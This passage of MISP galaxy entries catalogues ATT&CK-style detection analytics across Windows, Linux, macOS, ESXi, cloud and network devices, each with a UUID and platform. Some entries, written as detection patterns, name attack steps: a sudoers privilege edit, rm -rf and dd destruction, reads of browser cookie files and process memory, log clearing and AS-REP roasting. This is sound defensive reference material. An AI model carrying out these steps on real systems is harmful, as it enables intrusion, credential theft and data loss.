Internet scanners may be used to look for patterns associated with malicious content designed to collect host hardware information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox) Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID 9ead155d-e99b-4cca-8ace-0a90d533e875 which can be used as unique global reference for Analytic 2019 - AN2019 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2019
mitre_platforms ['PRE']

Analytic 1029 - AN1029

Detection of AppCert DLL abuse involves correlating registry modifications to the AppCertDLLs key with subsequent unexpected DLL load behavior during process creation events. Specifically, defenders can observe abnormal DLLs being loaded into standard Windows processes after changes to the 'AppCertDLLs' registry value. Monitoring CreateProcess-family API executions with injected DLLs and linking those DLLs back to recent registry edits is key to identifying misuse. This is often accompanied by elevated privileges and potential lateral movement or discovery behavior.

Internal MISP references

UUID abe61118-51b2-45ad-93bc-9215dad25b25 which can be used as unique global reference for Analytic 1029 - AN1029 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1029
mitre_platforms ['Windows']

Analytic 0129 - AN0129

Execution of scripts or binaries that check for virtualization indicators (e.g., system_profiler, ioreg -l, kextstat), combined with delay functions or anomalous launchd activity.

Internal MISP references

UUID b12639b9-5daa-46aa-a21f-521f6962f042 which can be used as unique global reference for Analytic 0129 - AN0129 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0129
mitre_platforms ['macOS']

Analytic 0912 - AN0912

Direct execution of /bin/vmx or presence of rogue .vmx files not registered in vCenter inventory. Defender perspective: anomalous commands in shell history, edits to rc.local.d/local.sh for persistence.

Internal MISP references

UUID d677a72d-db0e-4332-a467-95b19836ef16 which can be used as unique global reference for Analytic 0912 - AN0912 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0912
mitre_platforms ['ESXi']

Analytic 0313 - AN0313

Monitoring for modification and execution of login hook scripts or LaunchAgents/LaunchDaemons used for persistence.

Internal MISP references

UUID 3b218f49-59ce-44a5-a10b-889c99e78934 which can be used as unique global reference for Analytic 0313 - AN0313 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0313
mitre_platforms ['macOS']

Analytic 1330 - AN1330

Internal user account accesses shared links outside org followed by mass file download

Internal MISP references

UUID 4eca5ae6-797c-41cb-bacd-dc7a6da58fb0 which can be used as unique global reference for Analytic 1330 - AN1330 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1330
mitre_platforms ['Office Suite']

Analytic 1033 - AN1033

Detects adversary behavior where a file with a benign-looking first extension (e.g., .txt, .jpg) ends with a dangerous second extension (e.g., .exe, .scr), and is subsequently executed. The behavior chain includes file creation with misleading naming and user or system-initiated process execution from the disguised file.

Internal MISP references

UUID 6eab694d-ea06-4487-99c4-0e21279530e8 which can be used as unique global reference for Analytic 1033 - AN1033 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1033
mitre_platforms ['Windows']

Analytic 1303 - AN1303

Detects suspicious registration of new password filter DLLs into the authentication process. Correlates registry modifications to LSASS Notification Packages with subsequent DLL creation and loading events. Observes anomalous file placement of DLLs in system directories followed by LSASS loading the new filter during logon/password change activity.

Internal MISP references

UUID 9fb6bb78-418a-483f-ae23-518ffde414d1 which can be used as unique global reference for Analytic 1303 - AN1303 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1303
mitre_platforms ['Windows']

Analytic 0331 - AN0331

Detects execution of image viewers or PowerShell scripts accessing or decoding files with mismatched MIME headers or embedded script-like byte patterns; often correlated with suspicious parent-child process lineage and outbound connections.

Internal MISP references

UUID a7666a4d-ece8-4e5b-ae85-d2987f14b950 which can be used as unique global reference for Analytic 0331 - AN0331 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0331
mitre_platforms ['Windows']

Analytic 0133 - AN0133

Detects attempts to clear RDP/network history and modify network configuration artifacts through command execution, registry key deletion, firewall rule changes, and suspicious file deletions (e.g., Default.rdp, registry edits to Terminal Server Client keys).

Internal MISP references

UUID d71c4839-8d23-41f4-b59a-8bd2c3517d1e which can be used as unique global reference for Analytic 0133 - AN0133 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0133
mitre_platforms ['Windows']

Analytic 0134 - AN0134

Detects deletion or overwriting of logs/configs that store SSH or proxy activity, such as /var/log/auth.log or custom .bash_history clearing tied to SSH sessions or firewall rule changes.

Internal MISP references

UUID 0bd02555-3b54-4425-84c8-118b95857df1 which can be used as unique global reference for Analytic 0134 - AN0134 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0134
mitre_platforms ['Linux']

Analytic 0314 - AN0314

Detection of modification to ESXi rc.local.d or rc scripts that are used to execute on boot.

Internal MISP references

UUID 32199f21-430f-4c91-b2d7-a0b7409cd5f0 which can be used as unique global reference for Analytic 0314 - AN0314 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0314
mitre_platforms ['ESXi']

Analytic 1430 - AN1430

Detects launch of command-line interpreters via Terminal, Automator, or hidden osascript, especially when parent process lineage deviates from user-initiated applications.

Internal MISP references

UUID 4a32d0e6-9486-4bbb-8807-7f913f96f448 which can be used as unique global reference for Analytic 1430 - AN1430 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1430
mitre_platforms ['macOS']

Analytic 1034 - AN1034

Correlates Group Policy updates that configure network logon scripts with subsequent remote file execution behaviors triggered by user logons to identify potential persistence or execution chains tied to adversarial manipulation of logon scripts.

Internal MISP references

UUID 53dd199d-4f38-4f12-83dd-f2d471d58a1b which can be used as unique global reference for Analytic 1034 - AN1034 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1034
mitre_platforms ['Windows']

Analytic 0413 - AN0413

Destruction via rm -rf, overwrite with dd or srm, often executed by script in /tmp or /private/tmp, may also involve file overwrite to political or decoy image data.

Internal MISP references

UUID 5e1b310a-ce3d-4271-83e0-87cd2862f959 which can be used as unique global reference for Analytic 0413 - AN0413 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0413
mitre_platforms ['macOS']

Analytic 0143 - AN0143

Detect sudo activity with NOPASSWD in /etc/sudoers or disabling tty_tickets, followed by immediate privileged commands (e.g., echo 'Defaults !tty_tickets' >> /etc/sudoers).

Internal MISP references

UUID 8825b589-3a6a-483a-9fc0-a4d00b1183ab which can be used as unique global reference for Analytic 0143 - AN0143 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0143
mitre_platforms ['macOS']

Analytic 1403 - AN1403

Detects access to known browser cookie files (e.g., ~/.mozilla/firefox/*.default/cookies.sqlite, ~/.config/google-chrome/) and suspicious reads of browser memory via /proc/[pid]/mem or ptrace.

Internal MISP references

UUID 9bcedfe7-c851-418a-b709-dd8883c7fc5e which can be used as unique global reference for Analytic 1403 - AN1403 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1403
mitre_platforms ['Linux']

Analytic 0431 - AN0431

A process (often spawned by a shell, interpreter, or malware implant) executes time discovery via commands (date, timedatectl, hwclock, cat /etc/timezone, /proc/uptime) or direct syscalls (time(), clock_gettime) and is (optionally) followed by scheduled task creation/modification (crontab, at) or conditional sleep logic.

Internal MISP references

UUID 9f2278c6-2e45-42fb-a1f9-00f02d496c53 which can be used as unique global reference for Analytic 0431 - AN0431 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0431
mitre_platforms ['Linux']

Analytic 1043 - AN1043

Execution of esxcli commands to enumerate datastore, configuration files, or directory structures by unauthorized or remote users.

Internal MISP references

UUID aaddc766-52bb-428b-98c4-3a742d10befa which can be used as unique global reference for Analytic 1043 - AN1043 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1043
mitre_platforms ['ESXi']

Analytic 0341 - AN0341

Behavioral correlation of privileged registry key creation under the W32Time TimeProviders path combined with a new DLL written to disk and potential process activity by LocalService. Indicates abuse of Time Providers for persistence.

Internal MISP references

UUID c223f997-8323-40c2-98c9-38a8a1779db4 which can be used as unique global reference for Analytic 0341 - AN0341 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0341
mitre_platforms ['Windows']

Analytic 1340 - AN1340

Authentication failure logs on routers/switches showing repeated use of default or common passwords across multiple accounts

Internal MISP references

UUID c35bd9de-acd9-41f9-9e4f-2a3aad461de6 which can be used as unique global reference for Analytic 1340 - AN1340 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1340
mitre_platforms ['Network Devices']

Analytic 1304 - AN1304

Correlate the creation or modification of containers using restart policies (e.g., 'always') or DaemonSets with elevated host access, service account misuse, or privileged container contexts. Watch for manipulation of systemd units involving containers or pod scheduling targeting specific nodes or namespaces.

Internal MISP references

UUID de64bfbd-a6ed-4674-b0c5-dd485cba943b which can be used as unique global reference for Analytic 1304 - AN1304 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1304
mitre_platforms ['Containers']

Analytic 1503 - AN1503

Detects anomalous authentication activity such as sign-ins from impossible geolocations or legacy protocols from high-privileged accounts.

Internal MISP references

UUID 02571f27-8fa6-47cb-9097-0b84016a1dda which can be used as unique global reference for Analytic 1503 - AN1503 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1503
mitre_platforms ['Identity Provider']

Analytic 1305 - AN1305

Windows-specific environmental keying behavioral chain: (1) Rapid system information discovery through multiple techniques (WMI queries, registry enumeration, network share discovery, hostname/domain checks), (2) Target validation through specific environmental artifact collection (AD domain membership, network topology, installed software versions), (3) Cryptographic operation correlation indicating payload decryption based on collected environmental values, (4) Subsequent malicious code execution following successful environmental validation, (5) Temporal clustering of discovery activities suggesting automated environmental assessment

Internal MISP references

UUID 1fd68bec-86cb-4457-b0cd-56fc724fd578 which can be used as unique global reference for Analytic 1305 - AN1305 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1305
mitre_platforms ['Windows']

Analytic 0531 - AN0531

Automated execution of native utilities and scripts to discover, enumerate, and exfiltrate files and clipboard content. Focus is on detecting repeated file access, scripting engine use, and use of command-line utilities commonly leveraged by collection scripts.

Internal MISP references

UUID 29433de9-360e-4189-9f6d-fb00c9a57e41 which can be used as unique global reference for Analytic 0531 - AN0531 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0531
mitre_platforms ['Windows']

Analytic 0351 - AN0351

Insertion of public keys into authorized_keys using bash/zsh or editor tools, correlated with suspicious process ancestry.

Internal MISP references

UUID 29988e3f-2f65-4fe5-9bf7-dae0cb869fc6 which can be used as unique global reference for Analytic 0351 - AN0351 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0351
mitre_platforms ['macOS']

Analytic 0315 - AN0315

Detection of changes to device startup-config files that include boot scripts or scheduled execution routines.

Internal MISP references

UUID 416b5616-a16d-4ccc-b214-5873f96e5b1f which can be used as unique global reference for Analytic 0315 - AN0315 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0315
mitre_platforms ['Network Devices']

Analytic 0513 - AN0513

Process or script enumerates network shares via CLI (net view/net share, PowerShell Get-SmbShare/WMI) or OS APIs (NetShareEnum/ srvsvc.NetShareEnumAll RPC) → bursts of outbound SMB/RPC connections (445/139, \host\IPC$ / srvsvc) to many hosts inside a short window → optional follow-on file listing or copy operations.

Internal MISP references

UUID 8a2537c3-9e9a-482d-81e2-281f88cf8878 which can be used as unique global reference for Analytic 0513 - AN0513 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0513
mitre_platforms ['Windows']

Analytic 1035 - AN1035

Detects tampered hardware or firmware via anomalous host status telemetry. Behavioral chain: (1) Pre-OS or firmware components exhibit unexpected version changes, signature failures, or modified boot paths; (2) System management/firmware tools log hardware inventory drift; (3) Sensor health telemetry or boot attestation events fail baseline checks; (4) Follow-on process execution from altered firmware or unknown drivers after boot.

Internal MISP references

UUID 8ba8d516-486a-4347-9a48-56a312e83897 which can be used as unique global reference for Analytic 1035 - AN1035 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1035
mitre_platforms ['Windows']

Analytic 0153 - AN0153

Detection of unauthorized modifications to Windows root certificate stores by monitoring registry keys, certificate installation processes, and creation of new certificate entries not in baseline trusted lists.

Internal MISP references

UUID a65545d7-fa1b-4d6f-b19c-fa03862c6210 which can be used as unique global reference for Analytic 0153 - AN0153 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0153
mitre_platforms ['Windows']

Analytic 1350 - AN1350

Behavioral chain: (1) delegated administration offers/relationships created or modified by partner tenants; (2) mailbox delegation/impersonation enabled; (3) follow-on access from partner IPs.

Internal MISP references

UUID b5985d46-1d54-4a6d-81c8-0b577b5d8d17 which can be used as unique global reference for Analytic 1350 - AN1350 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1350
mitre_platforms ['Office Suite']

Analytic 0135 - AN0135

Detects removal of Remote Login or Screen Sharing logs in Unified Logging, deletion of com.apple.UTun, or suspicious Terminal use of rm, sudo pfctl -F all to clear network state/config history.

Internal MISP references

UUID d01951d8-aae8-48b6-afd3-68c86fc167b1 which can be used as unique global reference for Analytic 0135 - AN0135 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0135
mitre_platforms ['macOS']

Analytic 1530 - AN1530

Monitors for anomalous binary files written to disk with padded size and subsequent execution by user or service context.

Internal MISP references

UUID d27caeb7-7af2-4a55-9dcb-734730c0ccf1 which can be used as unique global reference for Analytic 1530 - AN1530 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1530
mitre_platforms ['macOS']

Analytic 1053 - AN1053

Correlate creation or modification of serverless functions (e.g., AWS Lambda, GCP Cloud Functions, Azure Functions) with anomalous IAM role assignments or permissions escalation events. Detect subsequent executions of newly created functions that perform unexpected actions such as spawning outbound network connections, accessing sensitive resources, or creating additional credentials.

Internal MISP references

UUID ecf190d1-5311-466f-a361-a33820b3c7b7 which can be used as unique global reference for Analytic 1053 - AN1053 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1053
mitre_platforms ['IaaS']

Analytic 0613 - AN0613

Detection of Linux container escape attempts via syscalls (unshare, keyctl, mount) or process execution outside container namespaces. Defenders may correlate unusual system calls from containerized processes with subsequent process creation on the host or modification of host resources.

Internal MISP references

UUID 0021ecae-778a-4726-aa66-1cf4ca01943e which can be used as unique global reference for Analytic 0613 - AN0613 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0613
mitre_platforms ['Linux']

Analytic 1063 - AN1063

Execution of unsigned kernel extensions (KEXTs), tampering with LaunchDaemons, or userspace hooks into system libraries.

Internal MISP references

UUID 0248d3dc-266e-45c3-89e4-4865f9174cfd which can be used as unique global reference for Analytic 1063 - AN1063 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1063
mitre_platforms ['macOS']

Analytic 1036 - AN1036

Monitors for hardware or firmware tampering by correlating system boot logs, hardware inventory changes, and secure boot/firmware verification failures. Behavioral chain: (1) UEFI/BIOS version drift; (2) secure boot disabled or signature verification errors; (3) unexpected modules or hardware devices enumerated at boot; (4) new device firmware images loaded from non-approved sources.

Internal MISP references

UUID 1c25310b-d8fa-472d-a10e-c327a8fba693 which can be used as unique global reference for Analytic 1036 - AN1036 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1036
mitre_platforms ['Linux']

Analytic 1360 - AN1360

Defenders may observe attempts to disable dedicated crypto hardware on network devices, often visible through anomalous CLI commands, unexpected firmware or configuration updates, and degraded encryption performance. Suspicious indicators include commands that alter hardware acceleration settings (e.g., disabling AES-NI or crypto engines), modification of system image files, or logs showing fallback from hardware to software encryption. Network traffic analysis may also reveal a sudden downgrade in throughput or cipher negotiation behavior consistent with the absence of hardware acceleration.

Internal MISP references

UUID 1dd7c76f-ff71-4597-8785-f7a730101a00 which can be used as unique global reference for Analytic 1360 - AN1360 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1360
mitre_platforms ['Network Devices']

Analytic 0163 - AN0163

Detect unauthorized manipulation of log files, database entries, or system configuration files through auditd and syslog. Correlate shell commands that alter HISTFILE or data-related processes with abnormal file access patterns.

Internal MISP references

UUID 2e700f3b-bf9c-427c-a099-b80d233c1ccb which can be used as unique global reference for Analytic 0163 - AN0163 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0163
mitre_platforms ['Linux']

Analytic 0136 - AN0136

Detects firewall rule modifications or reset of logs/connection tables (e.g., clear logging, erase startup-config, write erase) following remote access activity on routers, switches, or VPN appliances.

Internal MISP references

UUID 5258feec-def7-43e0-bbe9-459ba53d3e28 which can be used as unique global reference for Analytic 0136 - AN0136 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0136
mitre_platforms ['Network Devices']

Analytic 0316 - AN0316

Detects AS-REP roasting attempts by monitoring for Kerberos AS-REQ/AS-REP authentication patterns where preauthentication is disabled (Event ID 4768 with Pre-Auth Type 0). Correlates these requests with subsequent service ticket activity (Event ID 4769) and anomalies such as requests using weak RC4 encryption (etype 0x17). Excessive enumeration of accounts with 'Do not require Kerberos preauthentication' set in Active Directory is another key detection point.

Internal MISP references

UUID 7687688c-f91c-4487-948e-1d5b372fcdac which can be used as unique global reference for Analytic 0316 - AN0316 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0316
mitre_platforms ['Windows']

Analytic 0361 - AN0361

Suspicious invocation of GUI utilities or scripts with suppressed or redirected windowing options. Defender view: detection of X11 or Wayland calls to spawn windows that do not appear on active displays, or use of nohup/screen/tmux to mask interactive shells.

Internal MISP references

UUID 7ef0d746-f233-4b41-b999-43a6b1484574 which can be used as unique global reference for Analytic 0361 - AN0361 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0361
mitre_platforms ['Linux']

Analytic 1603 - AN1603

Detection of unauthorized changes to boot configurations pointing to TFTP servers, unusual firmware loads during netbooting, or suspicious TFTP traffic. Correlation of boot config modifications, command history logs, and unexpected system image hashes provides detection coverage for adversaries attempting to persist via malicious TFTP boot images.

Internal MISP references

UUID 92004715-82f0-409d-a520-fc49720e4f3d which can be used as unique global reference for Analytic 1603 - AN1603 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1603
mitre_platforms ['Network Devices']

Analytic 1306 - AN1306

Linux environmental keying behavioral chain: (1) System information gathering through native commands (uname, hostname, id, whoami, ifconfig/ip) and file system enumeration, (2) Network configuration discovery (route tables, DNS settings, network interfaces), (3) Filesystem and mount point analysis for target-specific directories or devices, (4) Process and service enumeration to identify target-specific software, (5) Cryptographic library usage correlation with collected environmental data, (6) Payload execution following successful environmental validation

Internal MISP references

UUID c24eb4e0-f23a-4d93-b2e0-7f5e7cae44f6 which can be used as unique global reference for Analytic 1306 - AN1306 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1306
mitre_platforms ['Linux']

Analytic 1630 - AN1630

Defenders may observe adversary attempts to extract configuration data from management repositories by monitoring for anomalous SNMP queries, API calls, or protocol requests (e.g., NETCONF, RESTCONF) that enumerate system configuration. Suspicious sequences include repeated queries from untrusted IPs, abnormal query types requesting sensitive configuration data, or repository access occurring outside of normal administrative maintenance windows. Abnormal authentication attempts, sudden enumeration of device inventory, or bulk data transfer of configuration files may also be observed.

Internal MISP references

UUID c5544183-4868-4a5c-ad8c-8a9359358298 which can be used as unique global reference for Analytic 1630 - AN1630 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1630
mitre_platforms ['Network Devices']

Analytic 0631 - AN0631

Detects when a script or binary is named with misleading or benign-looking extensions (.jpg, .doc) and is then executed via command line or a scheduled task. Includes ELF header mismatches and content-type inconsistencies on disk.

Internal MISP references

UUID e9ba7101-369f-48c6-8e6d-075ddd5744ba which can be used as unique global reference for Analytic 0631 - AN0631 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0631
mitre_platforms ['Linux']

Analytic 1037 - AN1037

Detects tampered Mac hardware/firmware by analyzing unified logs, EndpointSecurity events, and Apple Mobile File Integrity (AMFI) checks. Behavioral chain: (1) Boot process reports firmware signature mismatch; (2) Secure Boot policy altered; (3) new EFI drivers or hardware devices appear in inventory; (4) system extension loads from unapproved developer IDs post-boot.

Internal MISP references

UUID 0834f268-5810-4a90-8ef6-279dc0482471 which can be used as unique global reference for Analytic 1037 - AN1037 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1037
mitre_platforms ['macOS']

Analytic 0731 - AN0731

Analyze ESXi syslogs for management agents or VMs making outbound connections to dynamically calculated ports derived from DNS responses. Cross-check with VM traffic baselines to identify anomalies.

Internal MISP references

UUID 18c20664-b820-4a14-a7bf-5a75ac2fae92 which can be used as unique global reference for Analytic 0731 - AN0731 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0731
mitre_platforms ['ESXi']

Analytic 0371 - AN0371

Detects outbound traffic from hostd/vpxa or guest VM interfaces using unauthorized protocols such as FTP, HTTP POST bursts, or long-lived DNS tunnels.

Internal MISP references

UUID 3810988a-78be-4628-a9a5-500020f9c075 which can be used as unique global reference for Analytic 0371 - AN0371 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0371
mitre_platforms ['ESXi']

Analytic 0137 - AN0137

An adversary writes or drops a malicious Office Add-in (e.g., WLL, XLL, COM) to a trusted directory or modifies registry keys to load malicious add-ins on Office application launch. Upon user opening Word or Excel, the add-in is automatically loaded, triggering execution of the payload, often spawning scripting engines or anomalous child processes.

Internal MISP references

UUID 7263a8a8-a06f-4bdc-a021-3529ad683f9d which can be used as unique global reference for Analytic 0137 - AN0137 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0137
mitre_platforms ['Windows']

Analytic 0317 - AN0317

Detects attempts to enumerate local groups via Net.exe, PowerShell, or native API calls that precede lateral movement or privilege abuse.

Internal MISP references

UUID 78f4f0fe-55ef-4598-85ac-865cba1920d3 which can be used as unique global reference for Analytic 0317 - AN0317 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0317
mitre_platforms ['Windows']

Analytic 1307 - AN1307

macOS environmental keying behavioral chain: (1) System information discovery through native utilities (system_profiler, sw_vers, hostname, dscl) and Security framework queries, (2) Hardware and software enumeration including serial numbers, installed applications, and system versions, (3) Network configuration assessment (networksetup, scutil) and wireless network discovery, (4) Keychain and security context validation, (5) Unified Logs correlation with cryptographic framework usage (CommonCrypto, Security.framework), (6) Application bundle execution following environmental validation

Internal MISP references

UUID 8cd02c43-f3f5-4623-a816-cefe1f586288 which can be used as unique global reference for Analytic 1307 - AN1307 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1307
mitre_platforms ['macOS']

Analytic 0173 - AN0173

Detects native Python or framework-based execution from Terminal, embedded apps, or launchd jobs. Flags network calls, persistence writes, or system enumeration after Python launch.

Internal MISP references

UUID bcac4672-778d-4b35-8b75-eaaf84b91853 which can be used as unique global reference for Analytic 0173 - AN0173 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0173
mitre_platforms ['macOS']

Analytic 1370 - AN1370

Detection of adversaries attempting to stop or disable host-based security agents by killing daemons, unloading kernel modules, or modifying init/systemd service configurations.

Internal MISP references

UUID bda03bab-3f0b-4bd0-8a8f-77bcb2b1ee7d which can be used as unique global reference for Analytic 1370 - AN1370 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1370
mitre_platforms ['Linux']

Analytic 1073 - AN1073

Collection of device configuration via CLI commands (e.g., show running-config, copy flash, more), often followed by TFTP/SCP transfers.

Internal MISP references

UUID dfe1b67a-a1c1-43f4-a043-5784a315d018 which can be used as unique global reference for Analytic 1073 - AN1073 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1073
mitre_platforms ['Network Devices']

Analytic 0713 - AN0713

Defender observes unauthorized modification or creation of Python hook files such as .pth, sitecustomize.py, or usercustomize.py in Python site-packages, dist-packages, or user paths. This is often correlated with subsequent unexpected interpreter execution (e.g., python3 running without user interaction), changes in interpreter behavior (e.g., malicious imports), and outbound connections initiated from Python. Defender links write/modify actions on hook files with execve of python process and/or anomalous child process or network activity.

Internal MISP references

UUID e32ce63a-7c82-4115-8c50-e43113562132 which can be used as unique global reference for Analytic 0713 - AN0713 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0713
mitre_platforms ['Linux']

Analytic 1703 - AN1703

Application vetting services could look for misuse of dynamic libraries.

Internal MISP references

UUID 63e33566-c46c-45b8-acf1-247327b827e1 which can be used as unique global reference for Analytic 1703 - AN1703 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1703
mitre_platforms ['Android']

Analytic 1730 - AN1730

This behavior is seamless to the user and is typically undetectable.

Internal MISP references

UUID 75c4eac4-c61c-4d02-acd9-ec8f5b6cfaff which can be used as unique global reference for Analytic 1730 - AN1730 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1730
mitre_platforms ['Android']

Analytic 1308 - AN1308

Detects rundll32.exe invoked with atypical arguments (.dll, .cpl, javascript:, mshtml). DLLs not normally loaded by rundll32 are mapped into memory. Control_RunDLL or RunHTMLApplication invoked. Suspicious DLLs or scripts accessed from disk or network. Rundll32 reaches out to external domains (e.g., fetching .sct or .hta).

Internal MISP references

UUID 2cb33f68-48f8-4ffe-86e1-bc857a300398 which can be used as unique global reference for Analytic 1308 - AN1308 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1308
mitre_platforms ['Windows']

Analytic 0381 - AN0381

Detects email-sending behavior via Terminal, AppleScript, or Automator that interfaces with SMTP or IMAP, typically using curl or mail-related APIs in unsanctioned contexts.

Internal MISP references

UUID 43347e24-50d6-446e-923d-a6fd69805a22 which can be used as unique global reference for Analytic 0381 - AN0381 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0381
mitre_platforms ['macOS']

Analytic 1083 - AN1083

Detects BusyBox or Ash shell execution from unauthorized logins or remote connections. Focus is on rare shell invocations from DCUI, SSH sessions, or remote management paths. Also watches for payload droppers or persistence artifacts using shell.

Internal MISP references

UUID 52f4a572-0d43-4684-9598-6bc8cf2bffb1 which can be used as unique global reference for Analytic 1083 - AN1083 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1083
mitre_platforms ['ESXi']

Analytic 0813 - AN0813

Execution of renamed or dropped files with a trailing space to deceive users or analysts, especially in LaunchAgents or LaunchDaemons.

Internal MISP references

UUID 773188c7-6191-4ba4-ad39-b67ed8578dd9 which can be used as unique global reference for Analytic 0813 - AN0813 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0813
mitre_platforms ['macOS']

Analytic 0138 - AN0138

Malicious Office add-ins loaded via VSTO, COM, or VBA auto-load paths. Upon launch of Word/Excel/Outlook, the add-in executes code without user action. Add-in resides in trusted directory or registered via Office COM/VBE subsystem. Behavior includes unsigned add-in execution, anomalous load context, or add-in spawning interpreter process.

Internal MISP references

UUID 9ad4670e-f336-454f-960e-4f2f611f3657 which can be used as unique global reference for Analytic 0138 - AN0138 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0138
mitre_platforms ['Office Suite']

Analytic 0318 - AN0318

Detects enumeration of local groups using common binaries (groups, getent, cat /etc/group) or scripting with suspicious lineage.

Internal MISP references

UUID a62a2b36-00e9-481c-9a3a-14c14cd42dae which can be used as unique global reference for Analytic 0318 - AN0318 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0318
mitre_platforms ['Linux']

Analytic 1380 - AN1380

Privileged or rarely used accounts performing bulk access to SharePoint files or metadata over a short time window, indicating potential scripted collection of sensitive internal documents.

Internal MISP references

UUID afb1860a-e29a-4ce8-9524-ab371c5f8d4f which can be used as unique global reference for Analytic 1380 - AN1380 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1380
mitre_platforms ['Windows']

Analytic 0183 - AN0183

Use of nohup, disown, or AppleScript constructs to suppress process interrupts. Defender perspective: commands containing nohup or hidden background tasks (osascript with persistent execution) correlated with processes surviving user logouts.

Internal MISP references

UUID c9079261-caa7-4cfe-8be6-1359db599d27 which can be used as unique global reference for Analytic 0183 - AN0183 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0183
mitre_platforms ['macOS']

Analytic 1038 - AN1038

Correlate file modifications in shell startup scripts (e.g., .bashrc, .profile) with embedded trap commands and observe if those changes are followed by the unexpected execution of child processes when terminal signals (e.g., SIGINT) are triggered. Use contextual linking with user session activity to detect privilege misuse.

Internal MISP references

